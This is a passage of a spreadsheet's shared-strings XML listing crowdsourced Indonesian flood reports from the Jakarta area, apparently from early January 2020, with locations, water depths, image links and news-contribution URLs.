    <t>{ "points": 1, "flood_depth": 100, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir setinggi 1 meter</t>
  </si>
  <si>
    <t>Pengasinan</t>
  </si>
  <si>
    <t>Rawalumbu</t>
  </si>
  <si>
    <t>c7dc5fe8-91b5-4a26-b73a-33509bd2ad11</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c7dc5fe8-91b5-4a26-b73a-33509bd2ad11.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 44 }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1425", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Gang Lele Cakung setinggi betis orang dewasa</t>
  </si>
  <si>
    <t>Cakung Timur</t>
  </si>
  <si>
    <t>Cakung</t>
  </si>
  <si>
    <t>6fcdd445-ab34-4c37-877e-481f420b1ba4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6fcdd445-ab34-4c37-877e-481f420b1ba4.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 93, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Ketinggian 70 cm</t>
  </si>
  <si>
    <t>Kranji</t>
  </si>
  <si>
    <t>99c0d2dd-6ed2-4215-9d06-195ae405186d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/99c0d2dd-6ed2-4215-9d06-195ae405186d.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 101, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di wilayah pesing koneng kedoya utara dari pkl 5.00 wib hingga pkl 10.30 wib ketinggian sudah mencapai ketinggian kurang lebih 1m</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347001</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/01/347001-1577849827878445809.mp4-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "489", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Imbas Rel Tergenang, KRL Tanah Abang Setop Operasi Sementara</t>
  </si>
  <si>
    <t>Banjir merendam rel Kebayoran dan Pondok Ranji, akses KRL di stasiun Tanah Abang berhenti operasi saat ini, penumpang tampak menumpuk.</t>
  </si>
  <si>
    <t>Cideng</t>
  </si>
  <si>
    <t>Gambir</t>
  </si>
  <si>
    <t>a0d916ef-17dd-4391-9fe5-2587a8bd417a</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 190 }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1287", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Komplek IKPN</t>
  </si>
  <si>
    <t>Bintaro</t>
  </si>
  <si>
    <t>Pesanggrahan</t>
  </si>
  <si>
    <t>5cd8221d-4268-46d3-9fec-9e9da599cd3d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5cd8221d-4268-46d3-9fec-9e9da599cd3d.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 50 }</t>
  </si>
  <si>
    <t>Sungai meluap menyebabkan banjir sampai jalan raya</t>
  </si>
  <si>
    <t>Jurang Manggu Barat</t>
  </si>
  <si>
    <t>Pondok Aren</t>
  </si>
  <si>
    <t>Tangerang Selatan</t>
  </si>
  <si>
    <t>Banten</t>
  </si>
  <si>
    <t>580e7d69-a11e-44b4-ba18-6bad5336b6ac</t>
  </si>
  <si>
    <t>banjir cukup dalam belum bisa dilewati kendaraan apapun</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/346999</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/01/1577849675156251283.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "660", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kali Jantung Meluap, Warga Sukamaju Panik</t>
  </si>
  <si>
    <t>Kali Jantung Meluap, Warga Sukamaju RW15 RT 02 Kebanjiran setinggi 15 cm warga panik.</t>
  </si>
  <si>
    <t>Menteng</t>
  </si>
  <si>
    <t>d408d54c-b3dc-407e-a6b4-3270048f3c69</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 38 }</t>
  </si>
  <si>
    <t>Banjir dibeberapa titik perumahan GDA</t>
  </si>
  <si>
    <t>Mekar Jaya</t>
  </si>
  <si>
    <t>Sukma Jaya</t>
  </si>
  <si>
    <t>Depok</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347005</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/01/1577850404334737511.jpg</t>
  </si>
  <si>
    <t>Kavling Kinayungan Pondok Aren Terendam Banjir</t>
  </si>
  <si>
    <t>Banjir Terjadi Pada Kavling Kinayungan, Pondok Kacang Barat, Pondok Aren, Tangerang Selatan, Ketinggian Air Mencapi 50 cm, cuaca masih hujan</t>
  </si>
  <si>
    <t>Pondok Kacang Barat</t>
  </si>
  <si>
    <t>fb028580-a28e-4169-a96b-bea8f767e310</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fb028580-a28e-4169-a96b-bea8f767e310.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 100 }</t>
  </si>
  <si>
    <t>Penyempitan sungai akibat pembangunan perumahan di Kebayoran Height menyebabkan air tidak tertampung lagi hingga meluap dan membanjiri jalan</t>
  </si>
  <si>
    <t>d19959c0-2a71-46b3-8dd8-d033b94f2651</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d19959c0-2a71-46b3-8dd8-d033b94f2651.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 70 }</t>
  </si>
  <si>
    <t>Jembatan parung serab tidak bisa dilewati kendaraan karena air sungai meluap, walaupun proyek peninggian jembatan belum lama baru selesai.</t>
  </si>
  <si>
    <t>Parung Serab</t>
  </si>
  <si>
    <t>Ciledug</t>
  </si>
  <si>
    <t>Tangerang</t>
  </si>
  <si>
    <t>5c962b5d-edf7-49f4-a7c0-6edcea4f7dd8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5c962b5d-edf7-49f4-a7c0-6edcea4f7dd8.jpg</t>
  </si>
  <si>
    <t>Tanggul pondok kacang prima gang sukun jebol, sungai meluap ke perumahan.</t>
  </si>
  <si>
    <t>Pondok Kacang Timur</t>
  </si>
  <si>
    <t>0cd3ab01-6ff4-49f5-9e01-3730d926feee</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0cd3ab01-6ff4-49f5-9e01-3730d926feee.jpg</t>
  </si>
  <si>
    <t>Banjir akibat penyempitan aliran sungai dan pembangunan perumahan di Kebayoran Height berkurangnya resapan air di gang sukun.</t>
  </si>
  <si>
    <t>7122e303-15a0-49e1-9f1f-ca9299c59f15</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7122e303-15a0-49e1-9f1f-ca9299c59f15.jpg</t>
  </si>
  <si>
    <t>Ada luapan kali Grogol yang memasuki wilayah kompleks perumahan</t>
  </si>
  <si>
    <t>Cinere</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347012</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/01/1577851628355028213.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1133", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan Kapten Tendean Banjir Pemotor Banyak yang Mogok</t>
  </si>
  <si>
    <t>Jalan kapten tendean mengarah woltermonginsidi maupun sebaliknya banjir, sejumlah motor yang memaksa melintas terpaksa mogok. Kendaraan diharapkan cari alternatif jalan lain</t>
  </si>
  <si>
    <t>Kuningan Barat</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347015</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/01/1577852074150677477.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1139", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan Gatsu Jelang Pintu Tol Banjir, Kendaraan Putar Arah</t>
  </si>
  <si>
    <t>Jalan Gatsu jelang pintu tol juga tergenang banjir, sejumlah motor putar arah dan ada pula yang maksa nerobos hingga mogok</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347018</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/01/347018-15778525161003551472.mp4-03.jpg</t>
  </si>
  <si>
    <t>Layaknya di Kolam Renang Pemuda ini Santai Pake Pelampung</t>
  </si>
  <si>
    <t>Awal tahun baru banjir di komplek Inhutani, Cipayung, Ciputat Tangsel akibat hujan dari semalam. Anak muda satu ini memanfaatkannya sambil berenang seperti di kolam renang.</t>
  </si>
  <si>
    <t>Cipayung</t>
  </si>
  <si>
    <t>Ciputat</t>
  </si>
  <si>
    <t>a698b701-eb49-4593-b9de-463835accc17</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a698b701-eb49-4593-b9de-463835accc17.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "974", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Wilayah RW 04 Dan RW 05 Kel. Duri Kosambi Kec. Cengkareng Ketinggian antara 70 - 150 cm"</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347024</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/01/1577854463451240299.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "196", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Jalan Joglo Raya ke Tangerang, Pemotor Balik Arah</t>
  </si>
  <si>
    <t>Jalan Joglo Raya arah Tangerang maupun sebaliknya direndam banjir. Sejumlah motor putar arah. Meski jalan bisa dilalui oleh mobil namun tetap hati-hati</t>
  </si>
  <si>
    <t>Joglo</t>
  </si>
  <si>
    <t>830aec76-0381-444b-807b-f84a827503b8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/830aec76-0381-444b-807b-f84a827503b8.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 56, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Bukit Pamulang Indah</t>
  </si>
  <si>
    <t>Pamulang Timur</t>
  </si>
  <si>
    <t>Pamulang</t>
  </si>
  <si>
    <t>81cb714d-451a-4f61-a0b2-7585eefc2731</t>
  </si>
  <si>
    <t>https://images.petabencana.id/81cb714d-451a-4f61-a0b2-7585eefc2731.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 50, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2607", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir</t>
  </si>
  <si>
    <t>Kembangan Selatan</t>
  </si>
  <si>
    <t>055c9ba1-b88a-4405-8d66-3e881783f6f6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/055c9ba1-b88a-4405-8d66-3e881783f6f6.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 111 }</t>
  </si>
  <si>
    <t>Banjir di perumahan Serenade. Warga sdh dievakuasi</t>
  </si>
  <si>
    <t>Pakulonan Barat</t>
  </si>
  <si>
    <t>Kelapa Dua</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347031</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/01/347031-1577857932348506450.mov-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "860", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir Sebetis Orang Dewasa di Tol Bogor KM 3 Menuju Jakarta</t>
  </si>
  <si>
    <t>Tol Bogor KM 3 menuju jakarta,Tepatnya di pintu keluar RS Polri dan Cawang ada genangan setiggi betis orang dewasa.</t>
  </si>
  <si>
    <t>Ciganjur</t>
  </si>
  <si>
    <t>Jagakarsa</t>
  </si>
  <si>
    <t>08c88226-de2a-4fad-9911-3456a10653ab</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "226", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di kawasan kembangan utara</t>
  </si>
  <si>
    <t>Kembangan Utara</t>
  </si>
  <si>
    <t>ff4f2232-dadd-47d3-a37f-a5163488f937</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ff4f2232-dadd-47d3-a37f-a5163488f937.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 55 }</t>
  </si>
  <si>
    <t>Taman Royal 3 Poris Plawad Cipondoh Kota Tangerang</t>
  </si>
  <si>
    <t>Poris Plawad</t>
  </si>
  <si>
    <t>Cipondoh</t>
  </si>
  <si>
    <t>6f907f52-605b-485e-bcb1-d20adcffb585</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6f907f52-605b-485e-bcb1-d20adcffb585.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 150 }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1866", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di RT 08 RW 05 Halim Perdanakusuma Jakarta timur</t>
  </si>
  <si>
    <t>Halim Perdana Kusumah</t>
  </si>
  <si>
    <t>Makasar</t>
  </si>
  <si>
    <t>23dac78c-8d0f-40c3-b712-525e1315f49a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/23dac78c-8d0f-40c3-b712-525e1315f49a.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 131 }</t>
  </si>
  <si>
    <t>Jatibening permai air setinggi dada orang dewasa</t>
  </si>
  <si>
    <t>Jatibening</t>
  </si>
  <si>
    <t>Pondokgede</t>
  </si>
  <si>
    <t>55f0faf6-9244-4386-b225-284dd31864ae</t>
  </si>
  <si>
    <t>https://images.petabencana.id/55f0faf6-9244-4386-b225-284dd31864ae.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 50, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir selutut orang dewasa di komplek Cipinang Indah I</t>
  </si>
  <si>
    <t>9938c372-b72f-4cf1-9c73-0909cfea3a02</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9938c372-b72f-4cf1-9c73-0909cfea3a02.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "565", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan PAM Raya dan Jalan Remaja, Kelurahan Cempaka Baru, Kecamatan Kemayoran, banjir sejak jam 05.00</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347050</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/01/1577863526903582946.jpg</t>
  </si>
  <si>
    <t>Ciledug Indah Satu Banjir, Warga Butuh Bantuan</t>
  </si>
  <si>
    <t>Banjir Di Ciledug Indah Satu, Warga Evakuasi Swadaya, Butuh Pertolongan Tim SAR</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347052</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/01/15778638461477351649.jpg</t>
  </si>
  <si>
    <t>Tolong! Warga Ciledug Indah 1 Mengungsi, Belum Ada Bantuan</t>
  </si>
  <si>
    <t>Warga Ciledug Indah 1 Mengungsi Ke Lokasi Lebih Tinggi, Butuh Bantuan Tim SAR</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347056</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/01/347056-1577864399747756463.mov-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1479", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kondisi Terkini Ciliwung di Sekitar Bidara Cina Jakarta</t>
  </si>
  <si>
    <t>Kondisi Ciliwung saat ini di Jalan Puskesmas Bidara Cina, Otista, Jakarta banjir sudah tinggi ini.</t>
  </si>
  <si>
    <t>Bidara Cina</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347055</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/01/1577864419632701739.jpg</t>
  </si>
  <si>
    <t>Ciledug Indah 1 Banjir, Warga Minta PLN Matikan Listrik</t>
  </si>
  <si>
    <t>PLN mohon matikan listrik wilayah Ciledug Indah Satu, posisi banjir dengan ketinggian lebih dari 1 meter listriknya masih menyala.</t>
  </si>
  <si>
    <t>6de2b312-7596-4b4a-9567-bd91153e8a81</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6de2b312-7596-4b4a-9567-bd91153e8a81.jpg</t>
  </si>
  <si>
    <t>Wilayah terdampak bajir: Taman Narogong jembatan 1 - 3 (150cm),  Perumahan Villa Pelangi 60-80cm</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347066</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/01/1577868762689128254.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "718", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan Gunung Sahari Arah Senen Masih Banjir</t>
  </si>
  <si>
    <t>Jalan Gunung Sahari arah Senen masih banjir, terlihat polisi dan sebagian warga mengatur lalu lintas di area banjir tersebut</t>
  </si>
  <si>
    <t>Pasar Baru</t>
  </si>
  <si>
    <t>Sawah Besar</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347064</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/01/15778686471971894250.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "568", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Genangan 20-30 cm di Jalan Samanhudi Pasar Baru</t>
  </si>
  <si>
    <t>Di Jalan Samanhudi Pasar baru terlihat genangan setinggi 20-30 cm</t>
  </si>
  <si>
    <t>Gunung Sahari Selatan</t>
  </si>
  <si>
    <t>a893f73e-20da-4b31-9b1d-ada06b3896bc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a893f73e-20da-4b31-9b1d-ada06b3896bc.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 36, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di daerah marakash Pondok Ungu Permai Bekasi Utara, Kota Bekasi Jawa Barat</t>
  </si>
  <si>
    <t>Bahagia</t>
  </si>
  <si>
    <t>Babelan</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347063</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/01/347063-15778681261700673880.mp4-03.jpg</t>
  </si>
  <si>
    <t>Ciledug Indah 1 Banjir, Korban Meninggal Berhasil Dievakuasi</t>
  </si>
  <si>
    <t>Evakuasi korban meninggal akibat terjebak banjir di dalam rumah. Lokasi di Ciledug Indah 1.</t>
  </si>
  <si>
    <t>Jombang</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347073</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/01/347073-15778723581182227214.mov-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1365", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Warga di Kawasan Tongtek Jadikan Banjir Sebagai Hiburan</t>
  </si>
  <si>
    <t>Banjir di liburan tahun baru dijadikan wahana rekreasi warga di sekitar Tongtek, Jatinegara untuk berenang dan bermain air. Gubernur Daerah Khusus Ibukota Jakarta mengimbau warga yang bermukim di bantaran kali untuk mengungsi karena diprediksi air akan terus meningkat ket</t>
  </si>
  <si>
    <t>Manggarai</t>
  </si>
  <si>
    <t>Tebet</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347074</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/01/347074-15778724841788245974.mov-03.jpg</t>
  </si>
  <si>
    <t>Pedagang pun Ambil Kesempatan pada Banjir di Kawasan Tongtek</t>
  </si>
  <si>
    <t>Banjir di liburan tahun baru dijadikan wahana rekreasi warga disekitar Tongtek, Jatinegara untuk berenang dan bermain air. Pedagang jajanan pun mendapat berkah dari musibah banjir tersebut.</t>
  </si>
  <si>
    <t>e5ecc966-4b06-46b4-801b-fac37ba92cfd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e5ecc966-4b06-46b4-801b-fac37ba92cfd.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 41, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1252", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di daerah condet ciliwung</t>
  </si>
  <si>
    <t>Cililitan</t>
  </si>
  <si>
    <t>Kramat Jati</t>
  </si>
  <si>
    <t>4aa904ea-2775-48e3-b030-b484436cf8f7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4aa904ea-2775-48e3-b030-b484436cf8f7.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "889", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Sungai Jalan Haji Ipin Pondok Labu</t>
  </si>
  <si>
    <t>Lebak Bulus</t>
  </si>
  <si>
    <t>Cilandak</t>
  </si>
  <si>
    <t>0fec154c-75bc-4740-ba35-553cb4176434</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0fec154c-75bc-4740-ba35-553cb4176434.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 57 }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "830", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di gunung balong lebak bulus</t>
  </si>
  <si>
    <t>Cilandak Barat</t>
  </si>
  <si>
    <t>534f6f48-0c4b-485a-a364-8a3897b04976</t>
  </si>
  <si>
    <t>https://images.petabencana.id/534f6f48-0c4b-485a-a364-8a3897b04976.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 112 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "12", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Satria 3 jelambar grogol jakarta barat. Air belum surut dan cenderung tinggi. Pompa Kurang sesuai sehingga tidak ada perubahan"</t>
  </si>
  <si>
    <t>Jelambar</t>
  </si>
  <si>
    <t>Grogol Petamburan</t>
  </si>
  <si>
    <t>7950b740-694d-44e9-8f0d-60b041b8c4fa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7950b740-694d-44e9-8f0d-60b041b8c4fa.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 114 }</t>
  </si>
  <si>
    <t>f6464376-1824-4336-9400-ec25898b4615</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f6464376-1824-4336-9400-ec25898b4615.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 54 }</t>
  </si>
  <si>
    <t>Di dalam rumah sudah selutut</t>
  </si>
  <si>
    <t>bea4fe1c-78ba-4b1c-9909-70b77a18a806</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 65 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "28", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir jelambar barat 2</t>
  </si>
  <si>
    <t>Jelambar Baru</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347082</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/01/347082-1577880290843350589.mp4-03.jpg</t>
  </si>
  <si>
    <t>Debit Air Meninggi, Warga Perum Taman Mangu Indah Waspada</t>
  </si>
  <si>
    <t>Derasnya kali yang ada di Perumahan Taman Mangu Indah, Pondok Aren, Tangerang Selatan, Warga diimbau waspada, sejak tadi pagi belum ada tanda-tanda surut.</t>
  </si>
  <si>
    <t>05ec3687-fcf6-4064-9253-64e639612f1b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/05ec3687-fcf6-4064-9253-64e639612f1b.jpg</t>
  </si>
  <si>
    <t>Jl Telaga Sarangan Raya, Perum Bumi Belasi Baru Utara, Kel. Pengasinan, Kec. Rawalumbu, Bekasi</t>
  </si>
  <si>
    <t>8300fdd9-56a2-4c13-a781-c67248585d97</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8300fdd9-56a2-4c13-a781-c67248585d97.jpg</t>
  </si>
  <si>
    <t>Sampai jam 19.30, genangan msh stabil, blm juga surut</t>
  </si>
  <si>
    <t>Paninggilan</t>
  </si>
  <si>
    <t>4aa6f86e-9755-4a51-b988-78496158484e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4aa6f86e-9755-4a51-b988-78496158484e.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 74, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "134", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Taman Ratu Indah blok B2 dekat kali gang macan</t>
  </si>
  <si>
    <t>df88398b-534a-4d4a-8422-2150ae8fe4d3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/df88398b-534a-4d4a-8422-2150ae8fe4d3.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 171 }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2691", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di perumahan Ulujami Indah di kali Pesanggrahan</t>
  </si>
  <si>
    <t>Ulujami</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347084</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/01/347084-15778829951502283168.mp4-03.jpg</t>
  </si>
  <si>
    <t>Hingga Malam Banjir di Jl Gunung Sahari Belum Surut</t>
  </si>
  <si>
    <t>Jalan Gunung Sahari arah Senen persis di depan Mall Golden Truly belum surut, Pengendara pun melewati jalur transJ</t>
  </si>
  <si>
    <t>195f9576-86b5-4579-ae48-3839be4d3bc4</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 124, "report_type": "flood" }</t>
  </si>
  <si>
    <t>villa nusa indah 2 blok ee 6, daritadi sudah tidak bisa dihubungi, mohon bantuannya</t>
  </si>
  <si>
    <t>Bojong Kulur</t>
  </si>
  <si>
    <t>Gunung Putri</t>
  </si>
  <si>
    <t>Bogor</t>
  </si>
  <si>
    <t>b4269f51-8e18-4a47-b9e0-d224788967fc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b4269f51-8e18-4a47-b9e0-d224788967fc.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 94 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "153", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>adhi karya pintu air rt4 rw5 kedoya selatan belum ada petugas.terima kasih</t>
  </si>
  <si>
    <t>Kedoya Selatan</t>
  </si>
  <si>
    <t>83b2977b-787b-41ec-a41d-3c15d90a95fa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/83b2977b-787b-41ec-a41d-3c15d90a95fa.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 92 }</t>
  </si>
  <si>
    <t>Telah terjadi banjir di kemang pratama 3. Informasi banjir dikarenakan tanggul jebol di kemang pratama 1.</t>
  </si>
  <si>
    <t>Sepanjang Jaya</t>
  </si>
  <si>
    <t>373c2888-8c7c-4416-832d-5832c6d6edcc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/373c2888-8c7c-4416-832d-5832c6d6edcc.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 50, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir kiriman dari area Parung dan Depok ditambah hujan lokal yg deras sekali</t>
  </si>
  <si>
    <t>5a26cdb9-6e51-4c8c-9a77-8683a4b4f348</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5a26cdb9-6e51-4c8c-9a77-8683a4b4f348.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "204", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir belum surut, masuk rumah sampai setengah paha</t>
  </si>
  <si>
    <t>93008ec9-f17a-4b7b-8f57-d76187368c4d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/93008ec9-f17a-4b7b-8f57-d76187368c4d.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 76 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "124", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir gak surut2 jalan mangga 1 duri kepa</t>
  </si>
  <si>
    <t>4037eb7a-c3ae-43be-a88b-60a8b8703d43</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4037eb7a-c3ae-43be-a88b-60a8b8703d43.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "719", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>BANJIR DARI PAGI GADA TANDA SURUT AMPE MALEM</t>
  </si>
  <si>
    <t>e1412995-85d9-42ab-9555-c4c650ad5568</t>
  </si>
  <si>
